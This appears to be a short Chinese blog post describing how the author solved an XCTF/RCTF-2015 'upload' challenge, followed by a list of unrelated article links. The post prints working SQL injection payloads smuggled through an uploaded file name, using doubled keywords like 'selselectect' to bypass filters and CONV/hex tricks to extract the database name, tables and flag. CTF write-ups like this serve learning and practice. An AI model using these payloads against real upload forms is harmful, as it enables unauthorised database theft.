XCTF-upload
这道题的话,看了一下是RCTF-2015的原题。。。。可是这也太难了吧QAQ,文件名作为注入点可也是太秀了,害的我一直以为是文件上传QAQ,并且这道题的坑还不少,就是注入时的输出只能为10进制。。。。。这也就是说还需要你进行一下进制转换。。。
还有这里面将select和from过滤了一次。。。你还需要双写,,,哎。心累
一遍遍的fuzz的话,不知道要弄到什么时候。幸亏我是看着题解做的2333:)
不说了,因为自己啥也不会(看的题解QAQ),所以直接将payload发一下(其实不难,主要是你能够发现问题)
爆数据库名: '+(selselectect CONV(substr(hex(dAtaBase()),1,12),16,10))+'.jpg
将filename里面的内容替换掉,然后发送,刷新一下页面,就会有回显了。
先把10进制变为16进制在转为字符串,还有因为回显位数有限,所以你还需要多切割几次QAQ
爆表名:'+(selselectect CONV(substr(hex(selselectect table_name frfromom information_schema.tables where table_schema='web_upload' limit 1,1)),1,10),16,10))+'.jpg
爆列名:把上面的改一下就行了
爆flag:'+(selselectect+CONV(substr(hex((selselectect i_am_flag frfromom hello_flag_is_here )),25,12),16,10))+'.jpg
自己还是太菜了
最新文章
- entity framework自动迁移
- Python开发程序:FTP程序
- 初识zookeeper(一)之zookeeper的安装及配置
- Android Studio系列教程五--Gradle命令详解与导入第三方包
- CSAPP(2):程序的汇编表示(Linux版)
- [译]C++书籍终极推荐
- Android开发UI之布局文件LinearLayout
- 【翻译】A (very) short introduction to R R的简短介绍
- Linux下配置Apache最大连接数
- Dockerfile 最佳实践
- C#工作笔记
- 【Stack Overflow -- 原创加工、原创整理、生产实战】-- 深度复制
- 向日葵连CentOS
- iptables log日志记录功能扩展应用:iptables自动配置临时访问策略,任意公网登录服务器
- Python3学习笔记28-HtmlTestRunner
- vue build打包后css里的图片路径404不正确的问题
- 操作系统-移动操作系统-百科: iOS(苹果公司的移动操作系统)
- H5-DataUrl FileReader
- Python shell对比
- Android高效异步图片加载框架